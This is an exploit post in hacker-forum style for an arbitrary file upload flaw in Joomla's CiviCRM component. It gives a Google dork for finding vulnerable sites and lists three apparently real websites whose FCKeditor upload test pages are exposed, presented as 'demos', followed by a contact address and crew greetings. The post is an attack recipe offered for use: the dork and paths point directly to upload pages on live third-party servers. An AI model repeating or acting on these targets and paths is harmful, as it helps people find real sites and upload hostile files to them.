# Exploit Title: joomla 1.7 & 2.5 (com_civicrm) Arbitrary File Upload Vulnerability # Google Dork: inurl:/components/com_civicrm/ # Date: 08/22/2012 # Author: Crim3R # download Link : http://sourceforge.net/projects/civicrm/files/civicrm-stable/ # Tested on: all ================================== D3m0: http://artistic-webdesign.com/lynda/administrator/components/com_civicrm/civicrm/packages/fckeditor/editor/filemanager/connectors/uploadtest.html http://pflagillinois.org/administrator/components/com_civicrm/civicrm/packages/fckeditor/editor/filemanager/connectors/test.html http://madacenter.com/mada/administrator/components/com_civicrm/civicrm/packages/fckeditor/editor/filemanager/connectors/test.html ===============Crim3R@Att.Net========= $Home = %00 thanks to : 2MzRp - Mikili - 0x0ptim0us - iC0d3R - farbodmahini & Amir